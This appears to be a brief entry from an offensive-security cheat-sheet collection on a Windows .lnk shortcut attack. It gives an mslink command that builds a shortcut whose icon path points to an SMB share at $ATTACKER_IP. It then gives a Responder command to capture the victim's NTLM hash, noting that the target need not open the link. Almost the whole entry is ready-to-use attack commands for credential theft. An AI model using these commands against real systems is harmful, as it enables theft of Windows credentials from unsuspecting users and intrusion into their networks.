killchain-compendium/Exploits/Windows/LNK Exploit.md

.lnk exploit

• Trendmicro's article

• mamachine's tool

• Target does not even have to open the link directly

mslink_v1.3.sh -l notimportant -n shortcut -i \\\\$ATTACKER_IP\\yo -o shortcut.lnk

• Start a responder and wait for user's hash

responder -I eth0